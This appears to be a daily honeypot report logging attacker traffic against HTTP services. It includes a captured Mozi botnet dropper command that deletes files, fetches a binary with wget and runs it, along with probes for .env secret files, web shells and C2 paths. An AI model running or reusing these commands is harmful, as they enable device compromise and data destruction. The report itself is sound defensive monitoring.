# Daily Report: 2025-06-03

## Executive summary

Interaction report on the HTTP service of various honeypots around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of requests
- List of country_iso_code
## executive_summary

In today's report, we detected 1 stage 1 IP address(es), linked to 1 dropper URL(s).
There are 89 new requests that have never been observed before (these were added to the monitored request database).
A total of 1520 requests were recorded during the day, originating from 1 different countries, with a peak of 643 requests coming from JP.
## ot_simplified_report

Simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website); for more, contact us at social@shoggoth.industries.

source_country | targeted_country |
---|---|
US | Dubai |
## botnet_dropper_behaviour

remote_addr | request |
---|---|
120.86.253.229 | GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 |
## request

The requests listed here are those that have not yet been integrated into the request database.

index | number_of_occurrences | request |
---|---|---|
128 | 2 | GET /core/.env.prod HTTP/1.1 |
139 | 2 | GET /sources/.env.production HTTP/1.1 |
140 | 2 | GET /sources/.env.prod HTTP/1.1 |
153 | 2 | GET /test.dat HTTP/1.1 |
159 | 1 | GET /45.txt HTTP/1.1 |
186 | 1 | 64\x00 |
187 | 1 | \x87\x00\x00\x00IIMBTIJIBN\x08\x03\x00\x00{\x99Caig\x9C\x03\xC7U\x0E\x19\xB1\xDE\x9E\x84\x89\x8Bh\x97\x04FE\x8F\x01\x95\x09\xF2k\xFA oyv\x09\xF6 |
188 | 1 | GET /cmdoutput HTTP/1.1 |
191 | 1 | GET /wh/glass.php HTTP/1.1 |
192 | 1 | POST /nvidia_license_upd.php HTTP/1.1 |
193 | 1 | GET /download/1.txt HTTP/1.1 |
194 | 1 | \xC5\xB5 |
196 | 1 | GET /beacons/ HTTP/1.1 |
200 | 1 | GET /upaid.exe HTTP/1.1 |
201 | 1 | \x00\x00\x00\x15\x00\x00\x00\x02AA |
202 | 1 | `\x00\x00\x00 |
203 | 1 | \x00\x0E8Z\x9A}b]\x82\xC6\x9A\x00\x00\x00\x00\x00 |
205 | 1 | \x00\x00\x00 |
220 | 1 | GET /login?next=. HTTP/1.1 |
221 | 1 | GET /font/main-webfont.woff2 HTTP/1.1 |
227 | 1 | \xFF\xA2\xFF\x00\xFF=\xFF\xAD\xFF\x00\xFF\xD1\xFF\xD8\xF1\xAD\xFF\xBEH\xFB_5\xFF\xAD\xF1 |
230 | 1 | GET /BoPai.xq HTTP/1.1 |
240 | 1 | GET /extensions/a586bc8a-728c-4d06-8180-befb9e20c408 HTTP/1.1 |
248 | 1 | POST /ymybisvimqjoknhmgryit/getocmskdmsm/ HTTP/1.1 |
249 | 1 | GET /c2 HTTP/1.1 |
254 | 1 | GET /DBds HTTP/1.1 |
256 | 1 | GET /api/getit HTTP/1.1 |
270 | 1 | GET /s?ie=utf-8&tn=baidu&rsv_pq=vepmbtt4yo7dk172&rqlang=cn&rsv_t= HTTP/1.1 |
271 | 1 | POST /session HTTP/1.1 |
300 | 1 | GET /test.jpg HTTP/1.1 |
313 | 1 | \x96\x00\x00\x00\x99\x01\x00\x00\x8E\x00\x00\x00x\x9Ccd \x00\x5C\x5C\x83\xBDC\xFC\x03t\xC3L\x8D\xFD\xBC\xDDBKR\x8BK\x18\x10\x5C\xB0\x12. f\x04\xE2\x09\xFFe\x0Cf\x9F\xBC\x01b2x2\xE41\x940\xA42\xE40h0\x041h2(0X0\x181\x982\x983\x980\xF8\x00y\xEE\x0C\x99\x0C\xE9\x0C\x89\x0CI@\xBA\x04\xC8\xF7\x03\xAA-a(g\xC8g(b\xC8\x06\xF2\x9D\x81\xAC< LeH\x06\x8Ag\x82y$\x01\x1EM\x81\xABE\x0C\x0C\x07V\x1Ck@\x97b$\xCD\xA4\x81\x01\x00\x04\xF2\x1F= |
321 | 1 | \x22\x00\x00\x00 |
338 | 1 | \x00\x0E8K\x22\x8D{\xEA\x1E\x11\xAF\x00\x00\x00\x00\x00 |
359 | 1 | GET /OdinHttpCall1748970201 HTTP/1.1 |
361 | 1 | GET /odinhttpcall1748970201 HTTP/1.1 |
369 | 1 | GET /Odin/http/call1748970201 HTTP/1.1 |
377 | 1 | \x00\x0E8P\xB7\xE8\xE5\x10\x8FI~\x00\x00\x00\x00\x00 |
413 | 1 | POST /kpi HTTP/1.1 |
428 | 1 | GET /fsxlxhxzaf.png HTTP/1.1 |
446 | 1 | ABCDEFGHVCMD\x00\x00 |
451 | 1 | GET /1.txt HTTP/1.1 |
455 | 1 | GET /center/user_sid HTTP/1.1 |
456 | 1 | POST /nation.php HTTP/1.1 |
462 | 1 | GET /ui/authentication HTTP/1.1 |
472 | 1 | \x00censys\x00censysio\x00vt100/9600\x00 |
489 | 1 | GET /jquery/2.0.1/jquery.min.js HTTP/1.1 |
498 | 1 | asdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasd |
507 | 1 | 32\x00 |
516 | 1 | GET /1.dll HTTP/1.1 |
532 | 1 | GET /jquery.js HTTP/1.1 |
533 | 1 | \x00\x00\x00\xC0\xFESMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x08\x00\x01\x00\x00\x00\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x02\x00\x00\x00\x02\x02\x10\x02\x22\x02$\x02\x00\x03\x02\x03\x10\x03\x11\x03\x00\x00\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x0E\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
541 | 1 | GET /2jjd7VgJVdKDI4Ih4eB63gTcZqdcCuq-35nmN8xhwTM8_uHq3BUqs9Zb_nf_C7AzNzvltmRoSf6-WRNz- HTTP/1.1 |
542 | 1 | GET /1.exe HTTP/1.1 |
543 | 1 | GET /9lqF HTTP/1.1 |
546 | 1 | POST /QKBFJBVZsPKeqFS/HAchGeCttVyEtqZ.php HTTP/1.1 |
547 | 1 | GET /s1/index.htm HTTP/1.1 |
551 | 1 | GET /Qi7wAH39 HTTP/1.1 |
552 | 1 | GET /MYMj HTTP/1.1 |
558 | 1 | \x10\x00\x00\x00\x02\xB1\xD7\x02\x00\x00\x00\x00\xCA\x00<9 |
567 | 1 | \x9F\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x80\x00\x08\x00\x00\x00\xD3\xC3\xBB\xA7\xBD\xF8\xC8\xEB\x04\x00\x00\x80\x00\x1D\x00\x00\x00DESKTOP-9YRLE7 |
585 | 1 | \x11\x00\x00\x00\x01\x00\x00\x00n\x00\xE4!\xC1~/#u |
653 | 1 | \x00\x0E8\x89\x15\x1AR \xEC,\x14\x00\x00\x00\x00\x00 |
673 | 1 | \x00\x0E8\xEA?x\xD1\x1A\xD4\x09\xE6\x00\x00\x00\x00\x00 |
679 | 1 | GET /wiki HTTP/1.1 |
682 | 1 | GET /common2/out/1 HTTP/1.1 |
683 | 1 | GET /Dem7kTu/Login.php HTTP/1.1 |
685 | 1 | GET /llq.rar HTTP/1.1 |
689 | 1 | GET /kY8a HTTP/1.1 |
714 | 1 | GET /tat HTTP/1.1 |
716 | 1 | GET /common2/out/2 HTTP/1.1 |
721 | 1 | GET /manjusaka/static/ HTTP/1.1 |
726 | 1 | GET /fssdcsrweqww.ini HTTP/1.1 |
727 | 1 | GET /b.gif HTTP/1.1 |
746 | 1 | GET /search/s.php?i=1&id=APOX8NWOV42320 HTTP/1.1 |
750 | 1 | GET /trx38.zip HTTP/1.1 |
770 | 1 | GET /JYNl HTTP/1.1 |
777 | 1 | TQ8zyt9Dz3 |
778 | 1 | \x9E\x00\x00\x00IIMBTIJIBN\x08\x03\x00\x00{\x99Caig\x9C\x03\xC7eB\xC5\x09\xC1\x18\x11\x1A\x91\x87ppiX[os\xAFAEjp\xBF\x85%\x03\xDE\x08!\x91aa\xD3\xE2\x88\xBA\x07\x04R\x1C\xD8\xA5]\x5C\x83\xBDC\xFC\x03t\x83\x82=}\x5C\xC2\x22\xE8\xEF\xB0A\x02\x0CY\x18\x18\xFE\xF330\xCC\xFC\xCFH\x86n\xA33o\x8C\x0CNm44\xDF~\x8D,\xDB\xCF\xDDS Q\x87_iN\x0EYV\x91\x00 !add\xA2k \xAEkl\xA0`hbehJ\x8C^\x00\xCEi\x1B! |
781 | 1 | GET /1.jpg HTTP/1.1 |
790 | 1 | GET /viwwwsogou?op=8&query=%E7%A8%8F%E5%BB%BA%09%E9%BE%90%E1%B7%A2 HTTP/1.1 |
793 | 1 | GetRemoteShellCode_52\x00 |
794 | 1 | GET /202312082118335862cd360.bmp HTTP/1.1 |
805 | 1 | GET /Tan.jpg HTTP/1.1 |
817 | 1 | GET /test7.jpg HTTP/1.1 |
818 | 1 | GET /mine/random.exe HTTP/1.1 |
833 | 1 | GET /MSyD HTTP/1.1 |
844 | 1 | GET /test6.jpg HTTP/1.1 |
849 | 1 | POST /api/attach HTTP/1.1 |
862 | 1 | GET /zMLUH93A HTTP/1.1 |
## country_iso_code

index | number_of_occurrences | country_iso_code |
---|---|---|
0 | 643 | JP |
1 | 192 | US |
2 | 96 | DE |
3 | 92 | BG |
4 | 87 | GB |
5 | 63 | IN |
6 | 54 | CN |
7 | 52 | NL |
8 | 48 | HK |
9 | 35 | SC |
10 | 26 | CA |
11 | 24 | PL |
12 | 13 | CH |
13 | 12 | GH |
14 | 9 | AO |
15 | 8 | NG |
16 | 6 | PT |
17 | 6 | VN |
18 | 5 | ZA |
19 | 5 | TR |
20 | 4 | IL |
21 | 4 | ID |
22 | 3 | AZ |
23 | 3 | BE |
24 | 3 | SG |
25 | 3 | IR |
26 | 3 | KZ |
27 | 3 | TH |
28 | 2 | MD |
29 | 2 | KW |
30 | 2 | UA |
31 | 2 | RU |
32 | 2 | IE |
33 | 1 | CZ |
34 | 1 | BR |
35 | 1 | PA |
36 | 1 | TW |
37 | 1 | DZ |
38 | 1 | ES |
39 | 1 | KR |
40 | 1 | SE |